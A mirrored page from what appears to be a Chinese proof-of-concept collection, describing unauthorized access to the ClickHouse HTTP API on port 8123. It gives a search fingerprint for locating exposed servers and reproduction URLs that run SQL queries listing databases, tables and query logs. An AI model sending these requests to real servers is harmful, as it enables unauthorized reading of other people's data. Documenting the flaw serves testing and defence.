admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md
Threekiii 772a085cfa 更新漏洞
2023-08-28 15:55:36 +08:00

725 B
Raw Blame History

ClickHouse API 数据库接口未授权访问漏洞

漏洞描述

ClickHouse API 数据库接口存在未授权访问漏洞攻击者通过漏洞可以执行任意SQL命令获取数据库数据

漏洞影响

ClickHouse

网络测绘

"ClickHouse" && body="ok"

漏洞复现

登录页面

img

执行SQL语句

img

http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical

img

其他的SQL语句

http://your-ip:8123/?query=SHOW%20DATABASES

http://your-ip:8123/?query=SELECT%20*%20FROM%20system.tables